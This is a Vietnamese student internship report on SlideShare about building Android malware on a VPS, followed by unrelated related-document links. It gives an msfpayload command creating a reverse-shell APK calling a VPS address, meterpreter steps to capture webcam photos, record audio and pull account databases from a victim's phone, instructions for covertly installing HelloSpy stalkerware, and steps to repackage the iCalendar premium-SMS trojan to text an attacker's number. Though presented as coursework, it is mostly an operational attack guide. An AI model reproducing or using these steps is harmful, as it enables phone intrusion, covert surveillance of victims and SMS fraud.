SlideShare a Scribd company logo
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
BÁO CÁO ĐỀ TÀI THỰC TẬP 
ĐỀ TÀI: 
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH 
CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN 
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. 
GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG 
SINH VIÊN THỰC HIỆN: NGUYỄN XUÂN NGỌC 
Tạo mã độc trên VPS để xâm nhập Android 
(28/08/2014) 
Trang 1
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 2 
Nội dung: 
1. Tên đề tài: 
Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh 
sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài. 
2. Yêu cầu: 
 Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có 
internet) 
2.1 Cài đặt autosploit trên VPS 
2.2 Tạo mã độc trên VPS 
2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các 
android về VPS
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
II/ THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET 
1/ Cài mã độc trên VPS 
1.1/ Cài đặt Metasploit lên VPS 
Trang 3 
a/ Giới thiệu 
Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn 
công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng 
Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy 
trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
b/ Cài đặt 
Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta chọn 
phiên bản Community miễn phí và dùng cho nghiên cứu. 
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm 
khác. 
Chọn folder cài đặt:
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790: 
Chọn server và ngày hết hạn, để mặc định: 
Trang 4
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 5 
Quá trình cài đặt của Metasploit: 
Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Sau khi Finish trình duyệt web mở lên và đi tới giao diện 
Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào 
Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create 
Account: 
Trang 6
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi miễn 
phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License: 
2/ Từ VPS điều khiển thiết bị qua internet 
Trang 7 
Các bước thực hiện 
1. Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào 
Android như trên mang Lan với địa chỉ IP là địa chỉ của VPS 
Chúng ta vẫn sử dụng lệnh 
“Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
lport=4444 R > /root/Desktop/files.apk” 
ở đây địa chỉ VPS là 14.0.21.132 
2. Khởi động Metasploit Console trên VPS 
3. Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần 
trên, ở đây chỉ khác là sử dụng chính IP của VPS 
Trang 8
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
4. Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị 
Trang 9 
hack
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Để xem thông tin về máy, nhập lệnh SysInfo 
• Sử dụng camera: 
Để xem danh sách camera, nhập webcam_list 
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở 
Trang 
10 
danh sách camera ở phần trước. 
• Ghi âm 
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
• Lấy file từ sd card 
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục 
Dùng lệnh cd /sdcard/Download để vào thư mục 
Để tải về máy, ta nhập lệnh 
Download madoc.apk 
Trang 
11
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Một số lệnh khác : 
để upload gõ lệnh upload 
Và file này sẽ được tải về thư mục root của máy Kali 
Gõ shell để vào lệnh 
kiểm tra xem có root chưa gõ 
su 
whoami 
Nếu báo unknown id is 0 tức là đã root 
ls -l danh mục file và các quyền 
cd để chuyển hướng thư mục 
Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
để xem danh sách và down load các file hay thay đổi các file trong ROM 
đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
Trang 
12
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
^C để quay lại 
Sử dụng SQLite để mở file db 
Trang 
13 
3/ Ứng dụng HelloSpy 
3.1. Tải về và cài đặt HelloSpy 
HelloSpy có nhiều tính năng theo dõi như: 
o Theo dõi vị trí thiết bị 
o Lịch sử vị trí trong vòng 24 giờ 
o Theo dõi tin nhắn 
o Theo dõi danh bạ 
o Theo dõi nhật kí cuộc gọi 
o Lịch sử URL, lịch sử hình ảnh, lịch sử ứng dụng… 
Android 2.x: HelloSpy.com/downloads/hellotarget2.apk 
Android 4.x: HelloSpy.com/downloads/hellotarget4.apk 
Các bạn mở trình duyệt internet trên điện thoại và tải 1 trong 2 phiên bản trên .
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Sau khi việc tải đã hoàn tất, các bạn tiến hành cài đặt như các phần mềm 
khác . 
Trang 
14 
2. Sử dụng 
sau khi việc tải và cài đặt xong, các bạn phải khởi động lại máy , 
sau đó các bạn gọi số : “ #8888* “ để gọi phần mềm HelloSpy 
Nếu bạn là người mới sử dụng , các bạn tiến hành các thao tác đăng kí User 
. 
và bước cuối cùng là Log In tài khoản các bạn vừa tạo
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Tại đây, ta đăng nhập với tài khoản email đã đăng kí, sau đó khởi động lại máy. Từ bây giờ 
chỉ cần điện thoại được kết nối mạng là ta có thể biết được người dùng đã nhắn tin, gọi điện 
hay thậm chí biết cả vị trí của họ mà chỉ cần vào đăng nhập vào tài khoản đã nhập trong 
điện thoại của họ trên trang chủ của HelloSpy. 
4/ Cài đặt chương trình tích hợp mã độc (Trojan) trên Android 
4.1/ Giới thiệu 
iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc, người dùng 
cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn mà không hề mong 
muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà không rõ nguyên do. 
Trang 
15 
4.2/ Công cụ : 
a/ Java JDK 
Java là một công nghệ xây dựng các ứng dụng phần mềm. Nó được coi là công nghệ 
mang tính cách mạng và khả thi nhất trong việc tạo ra các ứng dụng có khả năng chạy thống nhất 
trên nhiều nền tảng mà chỉ cần biên dịch một lần. 
Java còn là một nền tảng phát triển và triển khai ứng dụng trong đó máy ảo Java, bộ thông dịch 
có vai trò trung tâm. 
Chúng ta có thể tải Java JDK về tại: 
http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html 
Tại đây, ta chỉ việc ấn vào Accept LicenseAgreement rồi chọn phiên bản để tải về.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
16 
b./ Android SDK 
Android SDK là một máy ảo của Android trên PC. Android SDK giúp hỗ trợ lập trình các 
ứng dụng của Android trên PC, hỗ trợ bạn những chức năng không khác gì một chiếc máy thật. 
Ta có thể tải Android SDK tại: http://developer.android.com/sdk/index.html
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Đầu tiên, ta sẽ giải nén thư mục vừa tải về. Sau đó vào eclipse.exe trong thư mục eclipse. 
Kế tiếp ta vào Windows -> Android SDK Manager sau đó bạn chọn phiên bản Android 
Trang 
17 
muốn tải về, sau đó ta ấn Install ….
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Sau khi tải xong, ta vào Windows -> Android Virtual Device Manager và tạo một 
smartphone hệ điều hành Android theo ý thích. 
Sau đó ta ấn Start và một smartphone ảo với hệ điều hành Adroid đã lựa chọn sẽ hiện ra. 
Trang 
18
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
c/ Apktool 
Apktool là công cụ dùng để giải mã các file apk và jar, phục vụ cho việc tùy chỉnh, sửa đổi 
Trang 
19 
các file đó. 
Ta có thể tải về tại: https://code.google.com/p/android-apktool/ 
4.3/ Hướng dẫn cài đặt Trojan iCalendar trên Android SDK 
Trước tiên, ta copy file iCalendar.apk vào thư mục apktool và mở CMD rồi di chuyển vào 
thư mục apktool. Kế tiếp ta giải mã iCalendar bằng lệnh : 
Apktool if iCalendar.apk 
Apktool d iCalendar.apk
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Vậy là ta đã tạo được thư mục giải mã iCalendar ta vào thư mục đó rồi vào smali ->com - 
Trang 
20 
> mj -> iCalendar. 
Tại đây, ta mở file iCalendar.smali rồi sử số trong dấu ngoặc kép của line 252 thành số 
điện thoại sẽ nhận tin nhắn và nội dung tin nhắn sẽ gửi tại local v1 ngay dưới đó.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Ta làm tương tự với smsReceive.smali tại line 41. 
Bây giờ ta sẽ biên soạn lại iCalendar bằng lệnh: 
Trang 
21 
Apktool b iCalendar 
Vậy là trong thư mục dist của iCalendar đã có một file iCalendar.apk dã được biên soạn 
lại. 
Kế tiếp ta sẽ copy file iCalendar.apk vừa tạo vào thư mục cài đặt Java JDK để signing cho 
nó. Sau khi di chuyển vào thư mục Java JDK, ta dùng lệnh: 
keytool –genkey –v –keystore iCalendar.keystore –alias iCalendar –keyalg RSA –keysize 
2048 –validity 10000
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Sau đó ta sẽ nhập password và điền một số thông tin tùy ý: 
Trang 
22 
Sau đó ta dùng lệnh: 
Jarsigner –verbose –keystore iCalendar.keystore iCalendar.apk iCalendar 
Jarsigner –verify –verbose –certs iCalendar.apk 
Bây giờ ta copy file iCalendar.apk trong Java JDK vào thư mục sdk của Android SDK và
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
tiến hành cài chương trình vào máy ảo ( máy ảo phải mở sẵn) : 
Adb –s emulator-5558 install iCalendar.apk 
Với 5558 là số điện thoại của máy cài và iCalendar.apk là tên chương trình. 
Vậy là bây giờ trong máy ảo đã có chương trình iCalend 
Trang 
23
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Chỉ cần mở iCalendar lên và ấn vài lần vào màn hình là đã có một tin nhắn được gửi đi mà người 
sử dụng không hề hay biết ,việc này sẽ làm mất đi tiền trong tài khoản sim của bạn, 
Trang 
24
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
25 
II – NGUỒN THAM KHẢO 
https://code.google.com/p/dex2jar/ 
https://code.google.com/p/innlab/downloads/detail?name=jd-gui- 
0.3.3.windows.zip& 
http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang-giao- 
dien-cuc-manh.12/

More Related Content

What's hot

Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đĐề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
Dịch Vụ Viết Bài Trọn Gói ZALO 0917193864
 
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
Cộng đồng iSocial
 
Bai 07 thiet bi ngoai vi va chuan giao tiep
Bai 07  thiet bi ngoai vi va chuan giao tiepBai 07  thiet bi ngoai vi va chuan giao tiep
Bai 07 thiet bi ngoai vi va chuan giao tiepQuang Nguyễn Thái
 
Tổng hợp các tài liệu cryptography thuat toan ma hoa
Tổng hợp các tài liệu cryptography  thuat toan ma hoaTổng hợp các tài liệu cryptography  thuat toan ma hoa
Tổng hợp các tài liệu cryptography thuat toan ma hoa
Hoi Nguyen
 
Xây dựng website tìm kiếm phòng trọ trực tuyến
Xây dựng website tìm kiếm phòng trọ trực tuyếnXây dựng website tìm kiếm phòng trọ trực tuyến
Xây dựng website tìm kiếm phòng trọ trực tuyến
trương dũng
 
Quy trình Digital Marketing hiệu quả
Quy trình Digital Marketing hiệu quảQuy trình Digital Marketing hiệu quả
Quy trình Digital Marketing hiệu quả
Huy Võ Minh
 
Novaon Communication Profile
Novaon Communication ProfileNovaon Communication Profile
Novaon Communication Profile
LinhThuyNguyen5
 
[Sharing T6] Ngôn ngữ cơ thể
[Sharing T6] Ngôn ngữ cơ thể[Sharing T6] Ngôn ngữ cơ thể
[Sharing T6] Ngôn ngữ cơ thể
Silicon Straits
 
lập trình di động
lập trình di độnglập trình di động
lập trình di độngtruong le hung
 
Sinh viên công nghệ thông tin và tương lai
Sinh viên công nghệ thông tin và tương laiSinh viên công nghệ thông tin và tương lai
Sinh viên công nghệ thông tin và tương lai
Thao Ho
 
Mai Linh Media Profile 2021
Mai Linh Media Profile 2021Mai Linh Media Profile 2021
Mai Linh Media Profile 2021
Minh H. Nguyen
 
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOTĐề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Dịch vụ viết bài trọn gói ZALO 0917193864
 
Bao cao Ma nguon mo
Bao cao Ma nguon moBao cao Ma nguon mo
Bao cao Ma nguon mo
Thái Duy Nguyễn
 
Bài 2 xử lý sự cố hệ điều hành
Bài 2   xử lý sự cố hệ điều hànhBài 2   xử lý sự cố hệ điều hành
Bài 2 xử lý sự cố hệ điều hànhMasterCode.vn
 
Lap trinh-c-cho-vdk
Lap trinh-c-cho-vdkLap trinh-c-cho-vdk
Lap trinh-c-cho-vdk
Hiepsvd Bk
 
Chủ đề biến đổi khí hậu
Chủ đề biến đổi khí hậuChủ đề biến đổi khí hậu
Chủ đề biến đổi khí hậu
Hương Vũ
 
SaoKim Packaging Portfolio
SaoKim Packaging PortfolioSaoKim Packaging Portfolio
SaoKim Packaging Portfolio
NguyenThanhTuan26
 
thuyet trình về các công cụTrinh duyet web
thuyet trình về các công cụTrinh duyet webthuyet trình về các công cụTrinh duyet web
thuyet trình về các công cụTrinh duyet websilverfall9792
 
Slide tài liệu - Tổng quan về SEO (update 2017)
Slide tài liệu - Tổng quan về SEO (update 2017)Slide tài liệu - Tổng quan về SEO (update 2017)
Slide tài liệu - Tổng quan về SEO (update 2017)
Dung Hoang Seothetop
 
Tài liệu kỹ thuật biến tần siemens G120C
Tài liệu kỹ thuật biến tần siemens G120CTài liệu kỹ thuật biến tần siemens G120C
Tài liệu kỹ thuật biến tần siemens G120C
Công ty công nghệ tự động hóa Hoàng Gia
 

What's hot (20)

Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đĐề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
Đề tài: Quản lý hệ thống bán vé máy bay của Vietnam Airline, 9đ
 
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
PHÂN LOẠI TÍNH CÁCH CON NGƯỜI THEO DISC
 
Bai 07 thiet bi ngoai vi va chuan giao tiep
Bai 07  thiet bi ngoai vi va chuan giao tiepBai 07  thiet bi ngoai vi va chuan giao tiep
Bai 07 thiet bi ngoai vi va chuan giao tiep
 
Tổng hợp các tài liệu cryptography thuat toan ma hoa
Tổng hợp các tài liệu cryptography  thuat toan ma hoaTổng hợp các tài liệu cryptography  thuat toan ma hoa
Tổng hợp các tài liệu cryptography thuat toan ma hoa
 
Xây dựng website tìm kiếm phòng trọ trực tuyến
Xây dựng website tìm kiếm phòng trọ trực tuyếnXây dựng website tìm kiếm phòng trọ trực tuyến
Xây dựng website tìm kiếm phòng trọ trực tuyến
 
Quy trình Digital Marketing hiệu quả
Quy trình Digital Marketing hiệu quảQuy trình Digital Marketing hiệu quả
Quy trình Digital Marketing hiệu quả
 
Novaon Communication Profile
Novaon Communication ProfileNovaon Communication Profile
Novaon Communication Profile
 
[Sharing T6] Ngôn ngữ cơ thể
[Sharing T6] Ngôn ngữ cơ thể[Sharing T6] Ngôn ngữ cơ thể
[Sharing T6] Ngôn ngữ cơ thể
 
lập trình di động
lập trình di độnglập trình di động
lập trình di động
 
Sinh viên công nghệ thông tin và tương lai
Sinh viên công nghệ thông tin và tương laiSinh viên công nghệ thông tin và tương lai
Sinh viên công nghệ thông tin và tương lai
 
Mai Linh Media Profile 2021
Mai Linh Media Profile 2021Mai Linh Media Profile 2021
Mai Linh Media Profile 2021
 
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOTĐề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
 
Bao cao Ma nguon mo
Bao cao Ma nguon moBao cao Ma nguon mo
Bao cao Ma nguon mo
 
Bài 2 xử lý sự cố hệ điều hành
Bài 2   xử lý sự cố hệ điều hànhBài 2   xử lý sự cố hệ điều hành
Bài 2 xử lý sự cố hệ điều hành
 
Lap trinh-c-cho-vdk
Lap trinh-c-cho-vdkLap trinh-c-cho-vdk
Lap trinh-c-cho-vdk
 
Chủ đề biến đổi khí hậu
Chủ đề biến đổi khí hậuChủ đề biến đổi khí hậu
Chủ đề biến đổi khí hậu
 
SaoKim Packaging Portfolio
SaoKim Packaging PortfolioSaoKim Packaging Portfolio
SaoKim Packaging Portfolio
 
thuyet trình về các công cụTrinh duyet web
thuyet trình về các công cụTrinh duyet webthuyet trình về các công cụTrinh duyet web
thuyet trình về các công cụTrinh duyet web
 
Slide tài liệu - Tổng quan về SEO (update 2017)
Slide tài liệu - Tổng quan về SEO (update 2017)Slide tài liệu - Tổng quan về SEO (update 2017)
Slide tài liệu - Tổng quan về SEO (update 2017)
 
Tài liệu kỹ thuật biến tần siemens G120C
Tài liệu kỹ thuật biến tần siemens G120CTài liệu kỹ thuật biến tần siemens G120C
Tài liệu kỹ thuật biến tần siemens G120C
 

Viewers also liked

Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho androidthach28
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Power point presentation
Power point presentationPower point presentation
Power point presentation
jengpanca
 
Motwalls 140508
Motwalls 140508Motwalls 140508
Motwalls 140508Motwalls
 
Magazine advert analysis ellie goulding
Magazine advert analysis ellie gouldingMagazine advert analysis ellie goulding
Magazine advert analysis ellie goulding
jadeashworthx
 
Our pitch
Our pitchOur pitch
Our pitch
effieprice
 
2009 casarh14
2009 casarh142009 casarh14
2009 casarh14
Al Colon
 
Yonsei Bob manager
Yonsei Bob managerYonsei Bob manager
Yonsei Bob manager
Moon Gi Choi
 
Photo manipulation
Photo manipulationPhoto manipulation
Photo manipulation
jadeashworthx
 
N'VIRON1 Services - Company Brochure
N'VIRON1 Services - Company BrochureN'VIRON1 Services - Company Brochure
N'VIRON1 Services - Company BrochureJatin Lad
 
Convenente inclusao envio_propostas
Convenente inclusao envio_propostasConvenente inclusao envio_propostas
Convenente inclusao envio_propostas
Murillo Basto
 
Take control of your financial destiny
Take control of your financial destinyTake control of your financial destiny
Take control of your financial destiny
eMERG
 
Eisagogi sto internet-email-www
Eisagogi sto internet-email-wwwEisagogi sto internet-email-www
Eisagogi sto internet-email-wwwCardet1
 
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक सेगाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
Govats Radhe Ravoria
 
Conducting Analysis
Conducting AnalysisConducting Analysis
Conducting AnalysisCardet1
 
Market
MarketMarket

Viewers also liked (20)

Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Cài đặt trojan cho android
Cài đặt trojan cho androidCài đặt trojan cho android
Cài đặt trojan cho android
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Power point presentation
Power point presentationPower point presentation
Power point presentation
 
Motwalls 140508
Motwalls 140508Motwalls 140508
Motwalls 140508
 
Blendtec - Final
Blendtec - FinalBlendtec - Final
Blendtec - Final
 
Magazine advert analysis ellie goulding
Magazine advert analysis ellie gouldingMagazine advert analysis ellie goulding
Magazine advert analysis ellie goulding
 
Our pitch
Our pitchOur pitch
Our pitch
 
2009 casarh14
2009 casarh142009 casarh14
2009 casarh14
 
Yonsei Bob manager
Yonsei Bob managerYonsei Bob manager
Yonsei Bob manager
 
Photo manipulation
Photo manipulationPhoto manipulation
Photo manipulation
 
Image analysis
Image analysisImage analysis
Image analysis
 
CV_Karan
CV_KaranCV_Karan
CV_Karan
 
N'VIRON1 Services - Company Brochure
N'VIRON1 Services - Company BrochureN'VIRON1 Services - Company Brochure
N'VIRON1 Services - Company Brochure
 
Convenente inclusao envio_propostas
Convenente inclusao envio_propostasConvenente inclusao envio_propostas
Convenente inclusao envio_propostas
 
Take control of your financial destiny
Take control of your financial destinyTake control of your financial destiny
Take control of your financial destiny
 
Eisagogi sto internet-email-www
Eisagogi sto internet-email-wwwEisagogi sto internet-email-www
Eisagogi sto internet-email-www
 
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक सेगाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
गाय की महिमा।। गीता प्रेस के कल्याण गो अंक विशेषांक से
 
Conducting Analysis
Conducting AnalysisConducting Analysis
Conducting Analysis
 
Market
MarketMarket
Market
 

Similar to Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc

BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
kakawpah0911
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
Xuân Ngọc Nguyễn
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Anh Hiếu
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
Xuân Ngọc Nguyễn
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
Chuc Thanh
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
phanconghien
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
Hữu Mỹ Lê Phan
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
kakawpah0911
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
kakawpah0911
 
Bao cao
Bao caoBao cao
Bao cao
Chuc Thanh
 
1
11
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
kakawpah0911
 

Similar to Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc (20)

BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4BÁO CÁO THỰC TẬP - TUẦN 3-4
BÁO CÁO THỰC TẬP - TUẦN 3-4
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
ATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua KyATHENA - Nguyen Xuan Ngoc - Giua Ky
ATHENA - Nguyen Xuan Ngoc - Giua Ky
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Bao cao
Bao caoBao cao
Bao cao
 
Vps
VpsVps
Vps
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
BÁO CÁO THỰC TẬP - TUẦN 5
